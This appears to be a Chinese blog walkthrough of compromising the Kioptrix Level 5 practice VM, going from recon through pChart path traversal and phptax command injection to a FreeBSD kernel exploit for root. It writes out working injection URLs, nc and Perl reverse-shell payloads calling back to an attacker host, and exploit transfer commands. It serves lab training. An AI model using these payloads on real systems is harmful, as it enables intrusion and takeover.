渗透Kioptrix-Level 5靶机

本篇文章旨在为网络安全渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透Kioptrix-Level 5靶机有一个初步的了解

一、信息收集阶段

因为靶机为本地部署虚拟机网段,查看dhcp地址池设置。得到信息IP为:192.168.60.0/24

1、扫描网段,确认目标靶机

nmap -sP 192.168.60.0/24

2、扫描目标靶机详细信息

nmap -sT -sV -sC -O 192.168.60.167
# -sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
# -sV 尝试确定每个打开端口上运行的服务的版本
# -sC 使用默认的脚本扫描(Script Scanning)可以帮助发现更多的信息,如漏洞、配置错误等

3、爆破http目录

dirsearch -u 192.168.60.167 -x 404,403,400

4、whatweb对网站指纹信息扫描

whatweb -v 192.168.60.167

二、寻找攻击面及攻击阶段

1、访问首页及查看源码

2、访问目录枚举页面

3、搜索源码中cms框架相关历史漏洞

searchsploit pchart

4、下载cms框架漏洞exp文件并利用

(1)打开网页搜索cms框架漏洞下载https://www.exploit-db.com/

(2)下载的exp文件放到攻击机


(3)阅读下载的txt文件


(4)按照利用exp文件提示的目录进行访问

http://192.168.60.167/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

5、查看刚才信息收集阶段找到的8080端口页面

6、利用找到的cms框架文件遍历漏洞查看apache配置文件

(已知apache是2.2.21 freeBSD版本,上维基百科查询配置文件目录)

http://192.168.60.167/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf
#已知道apache版本2.2所以目录为:/usr/local/etc/apache22/httpd.conf

7、使用Burp 替换User-agent数据进行访问8080端口

#意思是我们需要这个User-Agent头 替换一下Burp数据包
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
 
User-Agent:Mozilla/4.0 Mozilla4_browser

注意:每个数据包都要替换User-Agent:(Mozilla/4.0 Mozilla4_browser)

8、查询下phptax有没有可以利用的漏洞

searchsploit phptax

9、下载漏洞exp文件并查看

searchsploit -m 21665.txt
cat 21665.txt

10、根据exp文件访问页面发送请求

(1)按照exp的payload发送请求

#攻击机监听23235端口
nc -lvvp  23235

http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
http://192.168.60.167:8080/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

#burp数据包:

GET /phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make HTTP/1.1
Host: 192.168.60.167:8080
User-Agent: Mozilla/4.0 Mozilla4_browser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


(2)我们写一个命令 whoami >/tmp/abc 使用之前的读取文件payload

GET /phptax/drawimage.php?pfilez=xxx;%20whoami%20%3e%2ftmp%2fabc;&pdf=make HTTP/1.1
Host: 192.168.60.167:8080
User-Agent: Mozilla/4.0 Mozilla4_browser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

11、反弹其他shell尝试

nc -lvvp  4444
#攻击机创建

#反弹shell命令,一个不行就多试试其他的,可以用web扩展插件hack tool便捷的生成各种反弹shell
perl -e 'use Socket;$i="192.168.60.128";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.60.128:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'



#这里我们使用第二条反弹shell(perl -MIO)命令连接成功
GET /phptax/drawimage.php?pfilez=xxx;perl%20-MIO%20-e%20'%24p%3dfork%3bexit%2cif(%24p)%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET(PeerAddr%2c%22192.168.60.128%3a4444%22)%3bSTDIN-%3efdopen(%24c%2cr)%3b%24~-%3efdopen(%24c%2cw)%3bsystem%24_%20while%3c%3e%3b';&pdf=make HTTP/1.1
Host: 192.168.60.167:8080
User-Agent: Mozilla/4.0 Mozilla4_browser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

三、提权阶段

1、python创建交互式终端

2、查内核信息

uname -a

3、查找内核历史漏洞

searchsploit FreeBSD 9.0 

4、下载漏洞exp

searchsploit -m 28718.c 

5、kali攻击机上传exp

nc -lvvp 4455 < 28718.c 

6、反弹shell靶机下载exp连接攻击机

nc -nv 192.168.60.128 4455 > 28718.c

7、查看靶机下载的exp文件

8、靶机编译、查看exp文件

gcc -o 1 28718.c

9、执行编译后的文件,获取root权限

./1



声明! 学习内容来自B站up主 泷羽sec的OSCP考证培训课程有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值